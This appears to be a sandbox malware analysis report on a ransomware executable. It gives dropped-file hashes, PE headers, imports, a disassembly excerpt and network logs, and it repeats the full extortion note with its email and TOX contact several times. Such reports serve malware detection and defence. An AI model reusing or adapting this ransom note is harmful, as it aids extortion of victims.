                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\Music\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\OneDrive\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\Pictures\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\Recent\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\Saved Games\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\Searches\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\Videos\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Entropy (8bit):6.861955678814033
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:win_gui.exe.exe
                                File size:1'753'088 bytes
                                MD5:63e4d0e113333b0bd2af6adb9f06c639
                                SHA1:34439e3b52a4fea160aee4f52add18d0239bd991
                                SHA256:41e8d712ef343d367f7f6331a68d6e31ec6830d6f38bec00e72b2915fa697244
                                SHA512:a8cd908629cd8d0595a474c1786138afdcb12c9c7acb9220eb41c95c42d1b28dbce667d0cd16b284b2bfeab660838fd2bb718a1f017d60f5004ec7786ac0b4a7
                                SSDEEP:49152:oNFRbMHLycKTKP/2k067kIVuFerAeFPas6giG:oN02c6g2H6RucrAe
                                TLSH:7A85C011FBC19AB2DC93153855A2EB3B0A39FE305725C6D387D029658D326E12B3F396
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._Hg.............................!............@..........................`.......#....@................................

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x4121a1
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x67485F1D [Thu Nov 28 12:16:29 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:f3e9a441fd31627bce18580f89b04ac1

                                Entrypoint Preview

                                Instruction
                                call 00007F18BC906398h
                                jmp 00007F18BC905F6Fh
                                push ebp
                                mov ebp, esp
                                mov eax, dword ptr [ebp+08h]
                                push esi
                                mov ecx, dword ptr [eax+3Ch]
                                add ecx, eax
                                movzx eax, word ptr [ecx+14h]
                                lea edx, dword ptr [ecx+18h]
                                add edx, eax
                                movzx eax, word ptr [ecx+06h]
                                imul esi, eax, 28h
                                add esi, edx
                                cmp edx, esi
                                je 00007F18BC90610Bh
                                mov ecx, dword ptr [ebp+0Ch]
                                cmp ecx, dword ptr [edx+0Ch]
                                jc 00007F18BC9060FCh
                                mov eax, dword ptr [edx+08h]
                                add eax, dword ptr [edx+0Ch]
                                cmp ecx, eax
                                jc 00007F18BC9060FEh
                                add edx, 28h
                                cmp edx, esi
                                jne 00007F18BC9060DCh
                                xor eax, eax
                                pop esi
                                pop ebp
                                ret
                                mov eax, edx
                                jmp 00007F18BC9060EBh
                                push esi
                                call 00007F18BC9068B5h
                                test eax, eax
                                je 00007F18BC906112h
                                mov eax, dword ptr fs:[00000018h]
                                mov esi, 00516284h
                                mov edx, dword ptr [eax+04h]
                                jmp 00007F18BC9060F6h
                                cmp edx, eax
                                je 00007F18BC906102h
                                xor eax, eax
                                mov ecx, edx
                                lock cmpxchg dword ptr [esi], ecx
                                test eax, eax
                                jne 00007F18BC9060E2h
                                xor al, al
                                pop esi
                                ret
                                mov al, 01h
                                pop esi
                                ret
                                push ebp
                                mov ebp, esp
                                cmp dword ptr [ebp+08h], 00000000h
                                jne 00007F18BC9060F9h
                                mov byte ptr [00516288h], 00000001h
                                call 00007F18BC9066A3h
                                call 00007F18BC99B048h
                                test al, al
                                jne 00007F18BC9060F6h
                                xor al, al
                                pop ebp
                                ret
                                call 00007F18BC99D671h
                                test al, al
                                jne 00007F18BC9060FCh
                                push 00000000h
                                call 00007F18BC99B04Fh
                                pop ecx
                                jmp 00007F18BC9060DBh
                                mov al, 01h
                                pop ebp
                                ret
                                push ebp
                                mov ebp, esp
                                cmp byte ptr [00516289h], 00000000h
                                je 00007F18BC9060F6h
                                mov al, 01h

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x10b53c0x154.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x11b0000xa490.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x10ab4c0x38.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10ab880x40.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0xc10000x474.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000xbf9b40xbfa005d7c085cddeabd744f00d6148513f8ebFalse0.5078876691943901data6.647144113085254IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0xc10000x4be2a0x4c0003fa91f754729d1dc16d182a5693ce9e1False0.5044298673930921data6.220535718982431IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x10d0000xd4900x94005609b39a4a1dcd1277f6f9fed68eb434False0.747387035472973DOS executable (block device driver \277DN)6.6823693087063125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .reloc0x11b0000xa4900xa600603a58bd0564b031b21bf1844975c9d6False0.6193053463855421data6.622592328880688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Imports

                                DLLImport
                                KERNEL32.dllGetProcessId, CreateToolhelp32Snapshot, LoadLibraryA, Module32FirstW, GetProcAddress, FreeLibrary, FindFirstVolumeW, GetSystemDefaultUILanguage, TerminateProcess, SetFilePointer, GetLocaleInfoW, OpenProcess, GetLogicalDriveStringsW, Process32NextW, Process32FirstW, GetNativeSystemInfo, SetVolumeMountPointW, FindVolumeClose, GetVolumePathNamesForVolumeNameW, FindNextVolumeW, GetTickCount, GetDriveTypeW, GetModuleHandleW, GetComputerNameW, CreateThread, GlobalFree, GlobalAlloc, PostQueuedCompletionStatus, ExitThread, GetQueuedCompletionStatus, LeaveCriticalSection, DeleteTimerQueue, EnterCriticalSection, CreateTimerQueueTimer, CancelIo, GetProcessHeap, DecodePointer, SetEndOfFile, HeapSize, FlushFileBuffers, GetConsoleCP, HeapReAlloc, GetStringTypeW, SetStdHandle, HeapAlloc, LCMapStringW, CompareStringW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCPInfo, DeleteFileW, CreateDirectoryW, GetVersionExW, GetCommandLineW, InterlockedIncrement, HeapFree, CopyFileW, WaitForSingleObject, CreateMutexA, WriteConsoleW, GetStdHandle, lstrlenW, MoveFileW, lstrcpyW, WideCharToMultiByte, ExitProcess, DeleteCriticalSection, SetFilePointerEx, CloseHandle, lstrcatW, GetLastError, SetFileAttributesW, GetFileAttributesW, CreateFileW, GetEnvironmentVariableW, InitializeCriticalSection, GetModuleFileNameW, WriteFile, GetFileSizeEx, ReadFile, lstrcmpW, lstrcmpiW, MultiByteToWideChar, GetOEMCP, IsValidCodePage, FindNextFileA, FindFirstFileExA, lstrlenA, SetConsoleCtrlHandler, GetACP, GetModuleHandleExW, GetModuleFileNameA, RaiseException, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, SetConsoleMode, ReadConsoleW, ReadConsoleA, GetConsoleMode, GetSystemInfo, FindClose, InterlockedDecrement, FindNextFileW, FindFirstFileW, LocalFree, GetCurrentProcess, CreateTimerQueue, Sleep, CreateProcessW, ConvertFiberToThread, GlobalMemoryStatus, DeleteFiber, GetFileType, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, CreateIoCompletionPort
                                USER32.dllKillTimer, AppendMenuW, SetMenu, MoveWindow, RegisterHotKey, RegisterClassW, SetTimer, CreatePopupMenu, UnregisterClassW, SendMessageW, PostQuitMessage, GetProcessWindowStation, GetUserObjectInformationW, CreateMenu, UpdateWindow, EnableWindow, CreateWindowExW, MessageBoxW, IsWindowVisible, DestroyWindow, GetWindowRect, PostMessageW, wvsprintfW, ShowWindow, TranslateMessage, DispatchMessageW, GetMessageW, PeekMessageW, MessageBoxA, GetKeyState, UnregisterHotKey, DefWindowProcW
                                GDI32.dllCreateFontW, DeleteObject
                                COMDLG32.dllGetOpenFileNameW
                                ADVAPI32.dllCryptEnumProvidersW, CryptDestroyHash, CloseServiceHandle, OpenSCManagerW, ControlService, EnumDependentServicesW, OpenServiceW, QueryServiceStatusEx, AllocateAndInitializeSid, FreeSid, CheckTokenMembership, RegCreateKeyA, RegCloseKey, RegSetValueExW, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, LookupPrivilegeValueW, SetSecurityDescriptorDacl, AdjustTokenPrivileges, SetSecurityDescriptorOwner, SetEntriesInAclW, SetNamedSecurityInfoW, GetNamedSecurityInfoW, OpenProcessToken, InitializeSecurityDescriptor, BuildTrusteeWithSidW, GetUserNameW, LookupAccountNameW, CryptCreateHash, DeregisterEventSource, RegisterEventSourceW, ReportEventW, CryptAcquireContextW, CryptDestroyKey, CryptSetHashParam, CryptGetProvParam, CryptGetUserKey, CryptExportKey, CryptDecrypt, CryptSignHashW
                                SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, DragAcceptFiles, DragQueryFileW, SHGetSpecialFolderPathW, SHEmptyRecycleBinW, ShellExecuteW, CommandLineToArgvW, SHGetMalloc
                                ole32.dllCoInitializeSecurity, CoInitializeEx, CoTaskMemFree, CoSetProxyBlanket, CoCreateInstance, CoUninitialize
                                OLEAUT32.dllVariantInit, VariantClear
                                SHLWAPI.dllStrStrIW, StrCmpNW, StrStrIA, StrToIntW, StrStrA
                                CRYPT32.dllCertDuplicateCertificateContext, CertFreeCertificateContext, CertGetCertificateContextProperty, CertEnumCertificatesInStore, CertCloseStore, CertOpenStore, CertFindCertificateInStore
                                IPHLPAPI.DLLGetIpNetTable
                                NETAPI32.dllNetApiBufferFree, NetShareEnum
                                MPR.dllWNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum
                                WS2_32.dllrecv, send, WSAIoctl, closesocket, bind, WSACleanup, WSASetLastError, shutdown, WSASocketW, WSAGetLastError, setsockopt, freeaddrinfo, htons, getsockopt, gethostname, inet_ntoa, WSAAddressToStringW, socket, WSAStartup, getaddrinfo, gethostbyname
                                WININET.dllInternetCloseHandle, InternetOpenUrlW, InternetReadFile, InternetOpenW
                                COMCTL32.dll

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 3, 2024 17:50:42.716006994 CET49674443192.168.2.523.1.237.91
                                Dec 3, 2024 17:50:42.731592894 CET49675443192.168.2.523.1.237.91
                                Dec 3, 2024 17:50:42.872154951 CET49673443192.168.2.523.1.237.91
                                Dec 3, 2024 17:50:49.300003052 CET49959443192.168.2.5172.67.167.249
                                Dec 3, 2024 17:50:49.300045013 CET44349959172.67.167.249192.168.2.5
                                Dec 3, 2024 17:50:49.300214052 CET49959443192.168.2.5172.67.167.249
                                Dec 3, 2024 17:50:49.312314034 CET49959443192.168.2.5172.67.167.249
                                Dec 3, 2024 17:50:49.312342882 CET44349959172.67.167.249192.168.2.5
                                Dec 3, 2024 17:50:50.743565083 CET44349959172.67.167.249192.168.2.5
                                Dec 3, 2024 17:50:50.750335932 CET49959443192.168.2.5172.67.167.249
                                Dec 3, 2024 17:50:50.849601030 CET49959443192.168.2.5172.67.167.249
                                Dec 3, 2024 17:50:50.849638939 CET44349959172.67.167.249192.168.2.5
                                Dec 3, 2024 17:50:50.849972963 CET44349959172.67.167.249192.168.2.5
                                Dec 3, 2024 17:50:50.850616932 CET49959443192.168.2.5172.67.167.249
                                Dec 3, 2024 17:50:50.853074074 CET49959443192.168.2.5172.67.167.249
                                Dec 3, 2024 17:50:50.895337105 CET44349959172.67.167.249192.168.2.5
                                Dec 3, 2024 17:50:51.578934908 CET44349959172.67.167.249192.168.2.5
                                Dec 3, 2024 17:50:51.579010963 CET49959443192.168.2.5172.67.167.249
                                Dec 3, 2024 17:50:51.579034090 CET44349959172.67.167.249192.168.2.5
                                Dec 3, 2024 17:50:51.579049110 CET44349959172.67.167.249192.168.2.5
                                Dec 3, 2024 17:50:51.579088926 CET49959443192.168.2.5172.67.167.249
                                Dec 3, 2024 17:50:51.585010052 CET49959443192.168.2.5172.67.167.249
                                Dec 3, 2024 17:50:51.585022926 CET44349959172.67.167.249192.168.2.5
                                Dec 3, 2024 17:50:52.328648090 CET49674443192.168.2.523.1.237.91
                                Dec 3, 2024 17:50:52.348903894 CET49675443192.168.2.523.1.237.91
                                Dec 3, 2024 17:50:52.483143091 CET49673443192.168.2.523.1.237.91
                                Dec 3, 2024 17:50:53.926153898 CET49963443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:53.926212072 CET4434996323.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:53.926311016 CET49963443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:53.930445910 CET49963443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:53.930466890 CET4434996323.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:54.994035959 CET4434970323.1.237.91192.168.2.5
                                Dec 3, 2024 17:50:55.018405914 CET49703443192.168.2.523.1.237.91
                                Dec 3, 2024 17:50:55.367331028 CET4434996323.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:55.369261026 CET49963443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:55.408858061 CET49963443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:55.408879042 CET4434996323.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:55.409213066 CET4434996323.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:55.500499964 CET49963443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:55.547336102 CET4434996323.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:55.913216114 CET4434996323.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:55.913284063 CET4434996323.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:55.913852930 CET49963443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:55.930572987 CET49963443192.168.2.523.218.208.109
